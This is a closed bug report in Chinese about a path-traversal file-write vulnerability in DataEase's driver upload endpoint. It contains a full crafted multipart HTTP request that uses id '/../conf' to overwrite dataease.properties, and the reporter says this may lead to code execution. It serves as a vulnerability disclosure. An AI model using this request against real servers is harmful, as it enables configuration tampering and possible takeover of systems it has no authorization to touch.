Closed
Description
DataEase 版本
最新版
运行方式(安装包运行 or 源码运行 ?)
安装包运行
浏览器版本
任意
Bug 描述
任意文件跨目录写入
Bug 重现步骤(有截图更好)
数据源驱动管理处存在文件上传接口:
查看源代码:
直接将上传的文件以及ID进行拼接,因此可以构造包:
POST /driver/file/upload HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: xxx
Content-Type: multipart/form-data; boundary=---------------------------70362338610608895491036095575
Content-Length: 1167
Origin: http://10.211.55.18
Connection: close
Referer: http://10.211.55.18/
Cookie:
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="id"
/../conf
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="name"
123
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="createTime"
1654829420814
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="type"
mysql
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="driverClass"
null
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="desc"
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="typeDesc"
MySQL
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="showModel"
show
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="file"; filename="dataease.properties"
Content-Type: image/png
123
-----------------------------70362338610608895491036095575--
虽然返回包为错误,但实际上已经上传成功。
因此可以修改数据库配置文件或其他配置文件,可能会造成任意代码执行